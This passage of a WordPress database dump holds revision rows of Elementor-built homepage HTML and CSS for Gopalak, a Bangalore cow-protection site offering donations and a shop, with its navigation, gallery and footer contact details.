https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:23:02','2022-10-20 12:53:02','',1373,'https://gopalak.in/?p=1984',0,'revision','',0),(1985,1,'2022-10-20 18:23:02','2022-10-20 12:53:02','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 18:23:02','2022-10-20 12:53:02','',1373,'https://gopalak.in/?p=1985',0,'revision','',0),(1986,1,'2022-10-20 18:23:03','2022-10-20 12:53:03','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-